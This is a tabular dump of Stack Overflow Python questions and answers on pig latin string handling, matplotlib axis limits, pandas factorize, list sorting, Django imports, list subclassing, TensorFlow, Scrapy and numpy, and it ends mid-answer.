title
stringlengths 10
172
| question_id
int64 469
40.1M
| question_body
stringlengths 22
48.2k
| question_score
int64 -44
5.52k
| question_date
stringlengths 20
20
| answer_id
int64 497
40.1M
| answer_body
stringlengths 18
33.9k
| answer_score
int64 -38
8.38k
| answer_date
stringlengths 20
20
| tags
list |
---|---|---|---|---|---|---|---|---|---|
How do I find the first occurrence of a vowel and move it behind the original word (pig latin)? | 39,730,254 | <p>I need to find the first vowel of a string in python, and I'm a beginner. I'm instructed to move the characters before the first vowel to the end of the word and add '-ay'. For example "big" becomes "ig-bay" and "string" becomes "ing-stray" (piglatin, basically).</p>
<p>This is what I have so far:</p>
<pre><code>def convert(s):
ssplit = s.split()
beginning = ""
for char in ssplit:
if char in ('a','e','i','o','u'):
end = ssplit[char:]
strend = str(end)
else:
beginning = beginning + char
return strend + "-" + beginning + "ay"
</code></pre>
<p>I need to find a way to stop the "if" statement from looking for further vowels after finding the first vowel - at least I think it's the problem. Thanks!</p>
| 2 | 2016-09-27T16:50:44Z | 39,730,323 | <p>Python has the <code>break</code> and <code>continue</code>statements for loop control. You can set a boolean that you trigger such that: </p>
<pre><code>if flag:
break
#do code
#set flag
</code></pre>
| 0 | 2016-09-27T16:54:00Z | [
"python",
"findfirst"
]
|
How do I find the first occurrence of a vowel and move it behind the original word (pig latin)? | 39,730,254 | <p>I need to find the first vowel of a string in python, and I'm a beginner. I'm instructed to move the characters before the first vowel to the end of the word and add '-ay'. For example "big" becomes "ig-bay" and "string" becomes "ing-stray" (piglatin, basically).</p>
<p>This is what I have so far:</p>
<pre><code>def convert(s):
ssplit = s.split()
beginning = ""
for char in ssplit:
if char in ('a','e','i','o','u'):
end = ssplit[char:]
strend = str(end)
else:
beginning = beginning + char
return strend + "-" + beginning + "ay"
</code></pre>
<p>I need to find a way to stop the "if" statement from looking for further vowels after finding the first vowel - at least I think it's the problem. Thanks!</p>
| 2 | 2016-09-27T16:50:44Z | 39,730,383 | <p>You can use a <code>break</code> statement as soon as you found a vowel.
You also do not need to use any <code>split()</code> functions.
One big mistake you did was using <code>char</code> to get the <code>SubString</code>. You need to use the index of that char to get the <code>SubString</code> instead.</p>
<p>Take a look at this:</p>
<pre><code>def convert(s):
beginning = ""
index = 0;
for char in s:
if char in ('a','e','i','o','u'):
end = str(s[index:])
break
else:
beginning = beginning + char
index = index + 1
return str(end) + "-" + beginning + "ay"
</code></pre>
| 0 | 2016-09-27T16:57:09Z | [
"python",
"findfirst"
]
|
How do I find the first occurrence of a vowel and move it behind the original word (pig latin)? | 39,730,254 | <p>I need to find the first vowel of a string in python, and I'm a beginner. I'm instructed to move the characters before the first vowel to the end of the word and add '-ay'. For example "big" becomes "ig-bay" and "string" becomes "ing-stray" (piglatin, basically).</p>
<p>This is what I have so far:</p>
<pre><code>def convert(s):
ssplit = s.split()
beginning = ""
for char in ssplit:
if char in ('a','e','i','o','u'):
end = ssplit[char:]
strend = str(end)
else:
beginning = beginning + char
return strend + "-" + beginning + "ay"
</code></pre>
<p>I need to find a way to stop the "if" statement from looking for further vowels after finding the first vowel - at least I think it's the problem. Thanks!</p>
| 2 | 2016-09-27T16:50:44Z | 39,730,704 | <p>Break things down one step at a time.</p>
<p>Your first task is to find the first vowel. Let's do that:</p>
<pre><code>def first_vowel(s):
for index, char in enumerate(s):
if char in 'aeiou':
return index
raise Error('No vowel found')
</code></pre>
<p>Then you need to use that first vowel to split your word:</p>
<pre><code>def convert(s):
index = first_vowel(s)
return s[index:] + "-" + s[:index] + 'ay'
</code></pre>
<p>Then test it:</p>
<pre><code>print(convert('pig'))
print(convert('string'))
</code></pre>
<p>Full code, runnable, is here: <a href="https://repl.it/Dijj" rel="nofollow">https://repl.it/Dijj</a></p>
<p>The exception handling, for words that have no vowels, is left as an exercise.</p>
| 1 | 2016-09-27T17:16:53Z | [
"python",
"findfirst"
]
|
How do I find the first occurrence of a vowel and move it behind the original word (pig latin)? | 39,730,254 | <p>I need to find the first vowel of a string in python, and I'm a beginner. I'm instructed to move the characters before the first vowel to the end of the word and add '-ay'. For example "big" becomes "ig-bay" and "string" becomes "ing-stray" (piglatin, basically).</p>
<p>This is what I have so far:</p>
<pre><code>def convert(s):
ssplit = s.split()
beginning = ""
for char in ssplit:
if char in ('a','e','i','o','u'):
end = ssplit[char:]
strend = str(end)
else:
beginning = beginning + char
return strend + "-" + beginning + "ay"
</code></pre>
<p>I need to find a way to stop the "if" statement from looking for further vowels after finding the first vowel - at least I think it's the problem. Thanks!</p>
| 2 | 2016-09-27T16:50:44Z | 39,730,922 | <p>Side note. You can use a regex:</p>
<pre><code>>>> import re
>>> cases=['big','string']
>>> for case in cases:
... print case+'=>', re.sub(r'^([^aeiou]*)(\w*)', '\\2-\\1ay', case)
...
big=> ig-bay
string=> ing-stray
</code></pre>
| 0 | 2016-09-27T17:29:34Z | [
"python",
"findfirst"
]
|
How can I get the actual axis limits when using ax.axis('equal')? | 39,730,467 | <p>I am using <code>ax.axes('equal')</code> to make the axis spacing equal on X and Y, and also setting <code>xlim</code> and <code>ylim</code>. This over-constrains the problem and the actual limits are not what I set in <code>ax.set_xlim()</code> or <code>ax.set_ylim()</code>. Using <code>ax.get_xlim()</code> just returns what I provided. How can I get the actual visible limits of the plot?</p>
<pre><code>f,ax=plt.subplots(1) #open a figure
ax.axis('equal') #make the axes have equal spacing
ax.plot([0,20],[0,20]) #test data set
#change the plot axis limits
ax.set_xlim([2,18])
ax.set_ylim([5,15])
#read the plot axis limits
xlim2=array(ax.get_xlim())
ylim2=array(ax.get_ylim())
#define indices for drawing a rectangle with xlim2, ylim2
sqx=array([0,1,1,0,0])
sqy=array([0,0,1,1,0])
#plot a thick rectangle marking the xlim2, ylim2
ax.plot(xlim2[sqx],ylim2[sqy],lw=3) #this does not go all the way around the edge
</code></pre>
<p>What commands will let me draw the green box around the actual edges of the figure? </p>
<p><a href="http://i.stack.imgur.com/Z14Jg.png" rel="nofollow"><img src="http://i.stack.imgur.com/Z14Jg.png" alt="Plot showing that the results of get_xlim() and get_ylim() do not match the visible bounds of the figure"></a></p>
<p>Related: <a href="http://stackoverflow.com/questions/39775709/how-to-enforce-both-xlim-and-ylim-while-using-ax-axesequal/39795483#39795483" title="Force xlim, ylim, and axes('equal') at the same time by letting margins auto-adjust">Force <code>xlim</code>, <code>ylim</code>, and <code>axes('equal')</code> at the same time by letting margins auto-adjust</a> </p>
| 2 | 2016-09-27T17:02:07Z | 39,845,124 | <p>The actual limits are not known until the figure is drawn. By adding a canvas draw after setting the <code>xlim</code> and <code>ylim</code>, but before obtaining the <code>xlim</code> and <code>ylim</code>, then one can get the desired limits.</p>
<pre><code>f,ax=plt.subplots(1) #open a figure
ax.axis('equal') #make the axes have equal spacing
ax.plot([0,20],[0,20]) #test data set
#change the plot axis limits
ax.set_xlim([2,18])
ax.set_ylim([5,15])
#Drawing is crucial
f.canvas.draw() #<---------- I added this line
#read the plot axis limits
xlim2=array(ax.get_xlim())
ylim2=array(ax.get_ylim())
#define indices for drawing a rectangle with xlim2, ylim2
sqx=array([0,1,1,0,0])
sqy=array([0,0,1,1,0])
#plot a thick rectangle marking the xlim2, ylim2
ax.plot(xlim2[sqx],ylim2[sqy],lw=3)
</code></pre>
<p><a href="http://i.stack.imgur.com/v4XJd.png" rel="nofollow"><img src="http://i.stack.imgur.com/v4XJd.png" alt="Figure produced by script"></a></p>
| 1 | 2016-10-04T05:59:20Z | [
"python",
"python-2.7",
"matplotlib",
"plot"
]
|
How can I get the actual axis limits when using ax.axis('equal')? | 39,730,467 | <p>I am using <code>ax.axes('equal')</code> to make the axis spacing equal on X and Y, and also setting <code>xlim</code> and <code>ylim</code>. This over-constrains the problem and the actual limits are not what I set in <code>ax.set_xlim()</code> or <code>ax.set_ylim()</code>. Using <code>ax.get_xlim()</code> just returns what I provided. How can I get the actual visible limits of the plot?</p>
<pre><code>f,ax=plt.subplots(1) #open a figure
ax.axis('equal') #make the axes have equal spacing
ax.plot([0,20],[0,20]) #test data set
#change the plot axis limits
ax.set_xlim([2,18])
ax.set_ylim([5,15])
#read the plot axis limits
xlim2=array(ax.get_xlim())
ylim2=array(ax.get_ylim())
#define indices for drawing a rectangle with xlim2, ylim2
sqx=array([0,1,1,0,0])
sqy=array([0,0,1,1,0])
#plot a thick rectangle marking the xlim2, ylim2
ax.plot(xlim2[sqx],ylim2[sqy],lw=3) #this does not go all the way around the edge
</code></pre>
<p>What commands will let me draw the green box around the actual edges of the figure? </p>
<p><a href="http://i.stack.imgur.com/Z14Jg.png" rel="nofollow"><img src="http://i.stack.imgur.com/Z14Jg.png" alt="Plot showing that the results of get_xlim() and get_ylim() do not match the visible bounds of the figure"></a></p>
<p>Related: <a href="http://stackoverflow.com/questions/39775709/how-to-enforce-both-xlim-and-ylim-while-using-ax-axesequal/39795483#39795483" title="Force xlim, ylim, and axes('equal') at the same time by letting margins auto-adjust">Force <code>xlim</code>, <code>ylim</code>, and <code>axes('equal')</code> at the same time by letting margins auto-adjust</a> </p>
| 2 | 2016-09-27T17:02:07Z | 40,049,860 | <p>Not to detract from the accepted answer, which does solve the problem of getting updated axis limits, but is this perhaps an example of the XY problem? If what you want to do is draw a box around the axes, then you don't actually <em>need</em> the <code>xlim</code> and <code>ylim</code> in data coordinates. Instead, you just need to use the <code>ax.transAxes</code> transform which causes both <code>x</code> and <code>y</code> data to be interpreted in normalized coordinates instead of data-centered coordinates:</p>
<pre><code>ax.plot([0,0,1,1,0],[0,1,1,0,0], lw=3, transform=ax.transAxes)
</code></pre>
<p>The great thing about this is that your line will stay around the edges of the axes <strong><em>even if the <code>xlim</code> and <code>ylim</code> subsequently change</em></strong>.</p>
<p>You can also use <code>transform=ax.xaxis.get_transform()</code> or <code>transform=ax.yaxis.get_transform()</code> if you want only <code>x</code> or only <code>y</code> to be defined in normalized coordinates, with the other one in data coordinates.</p>
| 1 | 2016-10-14T18:29:40Z | [
"python",
"python-2.7",
"matplotlib",
"plot"
]
|
Convert column's data to enumerated dictionary key-value | 39,730,468 | <p>Is there a better way (in the sense of minimal code) that can do the followings: convert a column to enumerated numerical values so it should go somewhat this way:</p>
<ol>
<li>get a <strong>set</strong> of items in a columns </li>
<li>make a <strong>enumrated dictionary</strong> with key value</li>
<li>revert the key with value</li>
<li>use the key-value result instead of the data in a new column.</li>
</ol>
<p>So here's what I do today and wonder if anyone can show a classic way to do that so I can avoid writing the function <em>get_color_val</em>:</p>
<pre><code>import pandas as pd
cars = pd.DataFrame({"car_name": ["BMW","BMW","ACCURA","ACCURA","ACCURA","BMW","BMW","BMW"],"color":["RED","RED","RED","RED","GREEN","BLACK","BLUE","BLUE"]})
color_dict = dict(enumerate(set(cars["color"])))
color_dict = dict((y,x) for x,y in color_dict.iteritems())
def get_color_val(row):
my_key = row["color"]
my_value = color_dict.get(my_key)
return my_value
cars["color_val"] = cars.apply(get_color_val, axis=1)
cars = cars.drop("color",1)
print cars
</code></pre>
<blockquote>
<p>Result</p>
</blockquote>
<pre><code>Before------------
car_name color
0 BMW RED
1 BMW RED
2 ACCURA RED
3 ACCURA RED
4 ACCURA GREEN
5 BMW BLACK
6 BMW BLUE
7 BMW BLUE
After------------
car_name color_val
0 BMW 3
1 BMW 3
2 ACCURA 3
3 ACCURA 3
4 ACCURA 2
5 BMW 1
6 BMW 0
7 BMW 0
</code></pre>
| 2 | 2016-09-27T17:02:16Z | 39,730,516 | <p>I would use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.factorize.html" rel="nofollow">pd.factorize()</a> in this case:</p>
<pre><code>In [8]: cars['color_val'] = pd.factorize(cars.color)[0]
In [9]: cars
Out[9]:
car_name color color_val
0 BMW RED 0
1 BMW RED 0
2 ACCURA RED 0
3 ACCURA RED 0
4 ACCURA GREEN 1
5 BMW BLACK 2
6 BMW BLUE 3
7 BMW BLUE 3
</code></pre>
| 3 | 2016-09-27T17:05:17Z | [
"python",
"pandas",
"dictionary",
"dataframe",
"enumeration"
]
|
python sorting error: TypeError: 'list' object is not callable | 39,730,477 | <p>I am trying to sort a list of list based on the first item of each element:</p>
<pre><code>def getKey(item):
return item[0]
def myFun(x):
return sorted(x, key= getKey(x))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>I want the sorting based on the first item of each element, i.e. 1, 5 and 3. The expected result should be: <code>[[1,100], [3,30], [5,200]]</code></p>
<p>However, I got the error below:</p>
<pre><code>TypeErrorTraceback (most recent call last)
<ipython-input-7-4c88bbc1a944> in <module>()
3
4 my_x = [[1,100], [5,200], [3,30]]
----> 5 myFun(my_x)
<ipython-input-7-4c88bbc1a944> in myFun(x)
1 def myFun(x):
----> 2 return sorted(x, key= getKey(x))
3
4 my_x = [[1,100], [5,200], [3,30]]
5 myFun(my_x)
TypeError: 'list' object is not callable
</code></pre>
<p>Any idea what I did wrong here? Thanks!</p>
| -3 | 2016-09-27T17:02:41Z | 39,730,492 | <p><strong>UPDATE</strong></p>
<p><code>sorted</code>'s <code>key</code> attribute should be callable, so instead of assigning <code>key=getKey()</code> you need to <code>key=getKey</code></p>
<p><strong>INITIAL ANSWER</strong>(could be useful if you want to make code look better):</p>
<p><del>There is no such method as <code>getKey</code>, but</del> there is <a href="https://docs.python.org/2/library/operator.html#operator.itemgetter" rel="nofollow"><code>itemgetter</code></a> from <a href="https://docs.python.org/2/library/operator.html#operator" rel="nofollow"><code>operator</code></a> package</p>
<pre><code>from operator import itemgetter
def myFun(x):
return sorted(x, key=itemgetter(0))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p><strong>To the downvoters</strong>:</p>
<p>It's clearly said that</p>
<blockquote>
<p>I want the sorting based on the first item of each element</p>
</blockquote>
<p>And if you think that you would sort presented list only with <code>sorted()</code>, you are wrong.</p>
<pre><code>>>> my_x = [[1,100], [5,200], [3,30], [1,30]]
>>> myFun(my_x)
[[1, 100], [1, 30], [3, 30], [5, 200]]
>>> sorted(my_x)
[[1, 30], [1, 100], [3, 30], [5, 200]]
</code></pre>
<p>So <code>sorted</code> is not based only on first argument, as OP wanted</p>
<p><strong>INITIAL ANSWER'S UPDATE</strong> </p>
<p>Also, when i answered there was no <code>getKey</code> method, you can look at <a href="http://stackoverflow.com/posts/39730477/revisions">OP post edit history</a></p>
<p>And so OP post now have <code>getKey</code> method you can look at the appropriate @MosesKoledoye 's <a href="http://stackoverflow.com/a/39730625/3124746">answer</a></p>
| -1 | 2016-09-27T17:03:43Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
python sorting error: TypeError: 'list' object is not callable | 39,730,477 | <p>I am trying to sort a list of list based on the first item of each element:</p>
<pre><code>def getKey(item):
return item[0]
def myFun(x):
return sorted(x, key= getKey(x))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>I want the sorting based on the first item of each element, i.e. 1, 5 and 3. The expected result should be: <code>[[1,100], [3,30], [5,200]]</code></p>
<p>However, I got the error below:</p>
<pre><code>TypeErrorTraceback (most recent call last)
<ipython-input-7-4c88bbc1a944> in <module>()
3
4 my_x = [[1,100], [5,200], [3,30]]
----> 5 myFun(my_x)
<ipython-input-7-4c88bbc1a944> in myFun(x)
1 def myFun(x):
----> 2 return sorted(x, key= getKey(x))
3
4 my_x = [[1,100], [5,200], [3,30]]
5 myFun(my_x)
TypeError: 'list' object is not callable
</code></pre>
<p>Any idea what I did wrong here? Thanks!</p>
| -3 | 2016-09-27T17:02:41Z | 39,730,625 | <p>You don't need to call the function <code>getKey</code>. The signature of <a href="https://docs.python.org/2/library/functions.html#sorted" rel="nofollow"><code>sorted</code></a> requires you pass the <code>key</code> argument as a callable:</p>
<pre><code>sorted(x, key=getKey)
</code></pre>
| 2 | 2016-09-27T17:11:39Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
python sorting error: TypeError: 'list' object is not callable | 39,730,477 | <p>I am trying to sort a list of list based on the first item of each element:</p>
<pre><code>def getKey(item):
return item[0]
def myFun(x):
return sorted(x, key= getKey(x))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>I want the sorting based on the first item of each element, i.e. 1, 5 and 3. The expected result should be: <code>[[1,100], [3,30], [5,200]]</code></p>
<p>However, I got the error below:</p>
<pre><code>TypeErrorTraceback (most recent call last)
<ipython-input-7-4c88bbc1a944> in <module>()
3
4 my_x = [[1,100], [5,200], [3,30]]
----> 5 myFun(my_x)
<ipython-input-7-4c88bbc1a944> in myFun(x)
1 def myFun(x):
----> 2 return sorted(x, key= getKey(x))
3
4 my_x = [[1,100], [5,200], [3,30]]
5 myFun(my_x)
TypeError: 'list' object is not callable
</code></pre>
<p>Any idea what I did wrong here? Thanks!</p>
| -3 | 2016-09-27T17:02:41Z | 39,730,628 | <p>The problem is that you're assigning the result of <code>getKey(x)</code> to <code>key=getKey(x)</code>. You want to assign the function pointer.</p>
<pre><code>def getKey(item):
return item[0]
def myFun(x):
return sorted(x, key=getKey)
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>Having said that, if you're just sorting based on the first element, that's the default behavior of <code>sorted</code>.</p>
<p>You can just do <code>sorted(x)</code>.</p>
| 3 | 2016-09-27T17:11:54Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
python sorting error: TypeError: 'list' object is not callable | 39,730,477 | <p>I am trying to sort a list of list based on the first item of each element:</p>
<pre><code>def getKey(item):
return item[0]
def myFun(x):
return sorted(x, key= getKey(x))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>I want the sorting based on the first item of each element, i.e. 1, 5 and 3. The expected result should be: <code>[[1,100], [3,30], [5,200]]</code></p>
<p>However, I got the error below:</p>
<pre><code>TypeErrorTraceback (most recent call last)
<ipython-input-7-4c88bbc1a944> in <module>()
3
4 my_x = [[1,100], [5,200], [3,30]]
----> 5 myFun(my_x)
<ipython-input-7-4c88bbc1a944> in myFun(x)
1 def myFun(x):
----> 2 return sorted(x, key= getKey(x))
3
4 my_x = [[1,100], [5,200], [3,30]]
5 myFun(my_x)
TypeError: 'list' object is not callable
</code></pre>
<p>Any idea what I did wrong here? Thanks!</p>
| -3 | 2016-09-27T17:02:41Z | 39,730,750 | <p><code>getKey</code> is a function, (a type of "callable" object). Its output, <code>getKey(x)</code>, on the other hand, is a <code>list</code> object which is <em>not</em> callable. Your mistake is that you're setting <code>key=getKey(x)</code> and hence assigning a <code>list</code> object to the argument <code>key</code>, whereas <code>sorted</code> expects something callable attached to that name. So that explains why, when the internal sorting code tries to call your <code>key</code>, it fails with the error "'list' object is not callable". Really, you should have just said <code>key=getKey</code>.</p>
| 1 | 2016-09-27T17:20:19Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
import python packages from another directory into a Django project | 39,730,489 | <p>I have a Django project where a user uploads some images and I have some image processing routines which I write and they reside in a completely different folder in my hard drive (on the same machine).</p>
<p>Now, I plan to use something like celery to process these images. So, the idea would be that as soon as the files get uploaded, I can start some celery task which would process these images.</p>
<p>Now, I was wondering how I can change my Django settings so that these image processing routines are available from within my Django project? So, my image processing project has the following structure:</p>
<pre><code>ip
--- calibration
--- io
--- report
--- utils
</code></pre>
<p>So from my django project, I hope to be able to do something like:</p>
<pre><code>from io import *
</code></pre>
<p>and be able to use the classes defined there.</p>
| 0 | 2016-09-27T17:03:18Z | 39,730,605 | <p>You must append the folder to your python path using <code>sys.path.append()</code> then import using the module name as normal</p>
<p><a href="http://www.johnny-lin.com/cdat_tips/tips_pylang/path.html" rel="nofollow">Credit</a></p>
| 2 | 2016-09-27T17:09:59Z | [
"python",
"django"
]
|
Create a subclass of list without deep copy | 39,730,524 | <p>I want to subclass <code>list</code> to add some function to it, for example, <code>my_func</code>. </p>
<p>Is there a way to do this without copying the whole list, i.e. make a shallow copy, on the creation of the <code>MyList</code> object and let <code>MyList</code> reference the same list as the one used to construct it?</p>
<pre><code>class MyList(list):
def my_func(self):
# do some stuff
return self
l1 = list(range(10))
l2 = MyList(l1)
print(l1)
print(l2)
l1[3] = -5
print(l1)
print(l2)
</code></pre>
| 4 | 2016-09-27T17:05:40Z | 39,730,690 | <p>Pretty sure this isn't possible with a <code>list</code> subclass. It <em>is</em> possible with a <strong><a href="https://docs.python.org/3/library/collections.html#collections.UserList" rel="nofollow"><code>collections.UserList</code></a></strong> subclass (simply <em><a href="https://docs.python.org/2.7/library/userdict.html#module-UserList" rel="nofollow"><code>UserList</code></a></em> in Python <code>2</code>):</p>
<pre><code>from collections import UserList
class MyList(UserList):
def __init__(self, it=None):
# keep reference only for list instances
if isinstance(it, list):
self.data = it
else:
super().__init__(it)
def my_func(self):
# do some stuff
return self
</code></pre>
<p>The fact that <code>UserList</code> exposes a <a href="https://docs.python.org/3/library/collections.html#collections.UserList.data" rel="nofollow"><strong><code>data</code></strong></a> attribute containing the actual list instance makes it easy for us to replace it with the iterable <code>it</code> and essentially just drop the supplied argument there and <em>retain the reference</em>:</p>
<p>By initializing as you did: </p>
<pre><code>l1 = list(range(10))
l2 = MyList(l1)
print(l1, l2, sep='\n')
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
</code></pre>
<p>and then mutating:</p>
<pre><code>l1[3] = -5
</code></pre>
<p>The <code>data</code> attribute referencing <code>l1</code> is, of course, mutated:</p>
<pre><code>print(l1, l2, sep='\n')
[0, 1, 2, -5, 4, 5, 6, 7, 8, 9]
[0, 1, 2, -5, 4, 5, 6, 7, 8, 9]
</code></pre>
| 4 | 2016-09-27T17:15:56Z | [
"python",
"list",
"python-3.x",
"oop",
"inheritance"
]
|
TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'> | 39,730,528 | <p>While running the wide_n_deep_tutorial program from TensorFlow <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py" rel="nofollow">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py</a> on my dataset, the following error is displayed.</p>
<pre><code>"TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'>"
</code></pre>
<p><a href="http://i.stack.imgur.com/aqs3x.png" rel="nofollow">enter image description here</a></p>
<p>Following is the code snippet:</p>
<pre><code> def input_fn(df):
"""Input builder function."""
# Creates a dictionary mapping from each continuous feature column name (k) to
# the values of that column stored in a constant Tensor.
continuous_cols = {k: tf.constant(df[k].values) for k in CONTINUOUS_COLUMNS}
# Creates a dictionary mapping from each categorical feature column name (k)
# to the values of that column stored in a tf.SparseTensor.
categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].values,
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS}
# Merges the two dictionaries into one.
feature_cols = dict(continuous_cols)
feature_cols.update(categorical_cols)
# Converts the label column into a constant Tensor.
label = tf.constant(df[LABEL_COLUMN].values)
# Returns the feature columns and the label.
return feature_cols, label
def train_and_eval():
"""Train and evaluate the model."""
train_file_name, test_file_name = maybe_download()
df_train=train_file_name
df_test=test_file_name
df_train[LABEL_COLUMN] = (
df_train["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
df_test[LABEL_COLUMN] = (
df_test["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
model_dir = tempfile.mkdtemp() if not FLAGS.model_dir else FLAGS.model_dir
print("model directory = %s" % model_dir)
m = build_estimator(model_dir)
print('model succesfully build!')
m.fit(input_fn=lambda: input_fn(df_train), steps=FLAGS.train_steps)
print('model fitted!!')
results = m.evaluate(input_fn=lambda: input_fn(df_test), steps=1)
for key in sorted(results):
print("%s: %s" % (key, results[key]))
</code></pre>
<p>Any help is appreciated.</p>
| 0 | 2016-09-27T17:05:54Z | 39,747,378 | <p>would help to see the output prior to the error message to determine which part of the process this error tripped out at, but, the message says quite clearly that the key is expected to be a string whereas an integer was given instead. I am only guessing, but are the column names set out correctly in the earlier part of your script as they could potentially be the keys that are being referred to in this instance?</p>
| 0 | 2016-09-28T12:21:50Z | [
"python",
"pandas",
"tensorflow"
]
|
TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'> | 39,730,528 | <p>While running the wide_n_deep_tutorial program from TensorFlow <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py" rel="nofollow">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py</a> on my dataset, the following error is displayed.</p>
<pre><code>"TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'>"
</code></pre>
<p><a href="http://i.stack.imgur.com/aqs3x.png" rel="nofollow">enter image description here</a></p>
<p>Following is the code snippet:</p>
<pre><code> def input_fn(df):
"""Input builder function."""
# Creates a dictionary mapping from each continuous feature column name (k) to
# the values of that column stored in a constant Tensor.
continuous_cols = {k: tf.constant(df[k].values) for k in CONTINUOUS_COLUMNS}
# Creates a dictionary mapping from each categorical feature column name (k)
# to the values of that column stored in a tf.SparseTensor.
categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].values,
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS}
# Merges the two dictionaries into one.
feature_cols = dict(continuous_cols)
feature_cols.update(categorical_cols)
# Converts the label column into a constant Tensor.
label = tf.constant(df[LABEL_COLUMN].values)
# Returns the feature columns and the label.
return feature_cols, label
def train_and_eval():
"""Train and evaluate the model."""
train_file_name, test_file_name = maybe_download()
df_train=train_file_name
df_test=test_file_name
df_train[LABEL_COLUMN] = (
df_train["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
df_test[LABEL_COLUMN] = (
df_test["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
model_dir = tempfile.mkdtemp() if not FLAGS.model_dir else FLAGS.model_dir
print("model directory = %s" % model_dir)
m = build_estimator(model_dir)
print('model succesfully build!')
m.fit(input_fn=lambda: input_fn(df_train), steps=FLAGS.train_steps)
print('model fitted!!')
results = m.evaluate(input_fn=lambda: input_fn(df_test), steps=1)
for key in sorted(results):
print("%s: %s" % (key, results[key]))
</code></pre>
<p>Any help is appreciated.</p>
| 0 | 2016-09-27T17:05:54Z | 39,837,247 | <p>Judging by <a href="http://i.stack.imgur.com/aqs3x.png" rel="nofollow">your traceback</a>, the problem you're having is caused by your inputs to feature columns, or the output of your <code>input_fn</code>. Your sparse tensors are most likely being fed non-string dtypes for the <code>values</code> parameter; sparse feature columns expect string values. Ensure that you're feeding the correct data, and if you're sure you are, you can try the following:</p>
<pre><code>categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].astype(str).values, # Convert sparse values to string type
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS}
</code></pre>
| 0 | 2016-10-03T17:33:03Z | [
"python",
"pandas",
"tensorflow"
]
|
Scrapy - Filtered duplicate request | 39,730,566 | <p>I'm working with scrapy. I want to loop through a db table and grab the starting page for each scrape (random_form_page), then yield a request for each start page. Please note that I am hitting an api to get a proxy with the initial request. I want to set up each request to have its own proxy, so using the callback model I have: </p>
<pre><code>def start_requests(self):
for x in xrange(8):
random_form_page = session.query(....
PR = Request(
'htp://my-api',
headers=self.headers,
meta={'newrequest': Request(random_form_page, headers=self.headers)},
callback=self.parse_PR
)
yield PR
</code></pre>
<p>I notice:</p>
<pre><code>[scrapy] DEBUG: Filtered duplicate request: <GET 'htp://my-api'> - no more duplicates will be shown (see DUPEFILTER_DEBUG to show all duplicates)
</code></pre>
<p>In my code I can see that although it loops through 8 times it only yields a request for the first page. The others I assume are being filtered out. I've looked at <a href="http://doc.scrapy.org/en/latest/topics/settings.html#dupefilter-class" rel="nofollow">http://doc.scrapy.org/en/latest/topics/settings.html#dupefilter-class</a> but still unsure how to turn off this filtering action. How can I turn off the filtering?</p>
| 0 | 2016-09-27T17:07:54Z | 39,731,805 | <p>use </p>
<blockquote>
<p>dont_filter = True in Request object</p>
</blockquote>
<pre><code>def start_requests(self):
for x in xrange(8):
random_form_page = session.query(....
PR = Request(
'htp://my-api',
headers=self.headers,
meta={'newrequest': Request(random_form_page, headers=self.headers)},
callback=self.parse_PR,
dont_filter = True
)
yield PR
</code></pre>
| 1 | 2016-09-27T18:24:41Z | [
"python",
"scrapy"
]
|
Trying to Remove for-Loops from Python code, Performing Operations with a Look-up Table On Matrices | 39,730,616 | <p>I feel like this is a similar problem to the one I asked before, but I can't figure it out. How can I convert these two lines of code into one line with no for-loop?</p>
<pre><code>for i in xrange(X.shape[0]):
dW[:,y[i]] -= X[i]
</code></pre>
<p>In English, every row in matrix X should be subtracted from a corresponding column in matrix dW given by the vector y.</p>
<p>I should mention dW is DXC and X is NXD, so the transpose of X does not have the same shape as W, otherwise I could re-order the the rows of X, and take the transpose directly. However, it is possible for the columns in dW to have multiple corresponding rows which need to be subtracted.</p>
<p>I feel like I do not have a firm grasp of how indexing in python is supposed to work, which makes it difficult to remove unnecessary for-loops, or even to know what for-loops are possible to remove. </p>
| 0 | 2016-09-27T17:10:47Z | 39,730,962 | <p><strong>Approach #1</strong> Here's a one-liner vectorized approach with <code>matrix-multiplication</code> using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html" rel="nofollow"><code>np.dot</code></a> and <a href="http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html" rel="nofollow"><code>NumPy broadcasting</code></a> -</p>
<pre><code>dWout -= (np.arange(dW.shape[1])[:,None] == y).dot(X).T
</code></pre>
<p><strong>Explanation :</strong> Take a small example to understand what's going on -</p>
<p>Inputs :</p>
<pre><code>In [259]: X
Out[259]:
